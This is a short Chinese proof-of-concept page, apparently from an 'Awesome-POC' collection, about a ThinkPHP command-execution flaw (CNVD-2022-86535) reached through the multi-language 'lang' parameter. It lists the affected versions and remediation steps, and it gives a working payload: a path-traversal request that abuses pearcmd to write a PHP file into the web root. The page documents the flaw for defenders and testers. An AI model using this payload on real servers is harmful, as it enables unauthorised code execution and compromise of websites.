Awesome-POC/开发框架漏洞/ThinkPHP 命令执行漏洞 CNVD-2022-86535.md
2024-11-06 14:10:36 +08:00

30 lines
771 B
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# ThinkPHP 命令执行漏洞 CNVD-2022-86535
## 漏洞描述
该漏洞是由于 Thinkphp 开启了多语言功能,并且对参数 lang 传参过滤不严谨,导致攻击者可利用该漏洞执行命令。
## 漏洞影响
```
ThinkPHP >=V6.0.1<=V6.0.13
ThinkPHP >=V5.0.X<=V5.1.X
```
## 漏洞复现
payload
```
/index?lang=…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&+config-create+/&/+/var/www/html/test.php
```
## 漏洞修复
官方已发布漏洞补丁及修复版本,可以评估业务是否受影响后,酌情升级至安全版本。
如不需要多语言功能,请及时关闭此功能,可参考官方文档:
- https://www.kancloud.cn/manual/thinkphp6_0/1037637
- https://static.kancloud.cn/manual/thinkphp5/118132